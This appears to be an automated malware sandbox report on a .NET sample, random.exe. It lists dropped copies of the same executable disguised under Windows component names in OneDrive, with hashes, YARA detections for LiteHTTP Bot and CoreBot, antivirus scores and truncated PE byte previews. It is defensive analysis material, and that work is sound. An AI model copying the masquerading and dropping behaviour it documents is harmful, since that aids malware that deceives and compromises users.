                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\msecache.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\reference assemblies.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\reference assemblies.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows defender.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows defender.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows mail.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows mail.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows media player.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows media player.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows multimedia platform.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows multimedia platform.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows nt.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows nt.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows photo viewer.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows photo viewer.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows portable devices.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows portable devices.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windows sidebar.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windows sidebar.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\windowspowershell.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\windowspowershell.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Windows\SysWOW64\PING.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):275
                          Entropy (8bit):4.825671547285939
                          Encrypted:false
                          SSDEEP:6:PzXULmWxHLTpUrhaGbsW3CNcwAFeMmvVOIHJFxMVlmJHaVFhZIhIt3:P+pTpchaGbsTDAFSkIrxMVlmJHaV5t3
                          MD5:9EE0B7EDC68864CD9E69E2682823B251
                          SHA1:A89692239FCACCDA7C76743DEDF8EB2F244389D3
                          SHA-256:0736A9B3859B3B86C63FA64B4ED9DD3B44BC6EC639FD3CDB4DC738AE1C9A7065
                          SHA-512:6943B470836443868A1B9A0996F1E866BC7BC0D2EFD7ED22224C53065EB51C4393C369BA8DA99F104D90047C6F021C6F2642C8EC96786790EC6BEE76EF5E963E
                          Malicious:false
                          Preview:..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=8ms TTL=51....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 8ms, Maximum = 8ms, Average = 8ms..
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):5.495343186946422
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:random.exe
                          File size:38'400 bytes
                          MD5:e2e13615dffaff99a1d0cd9d32c4cf80
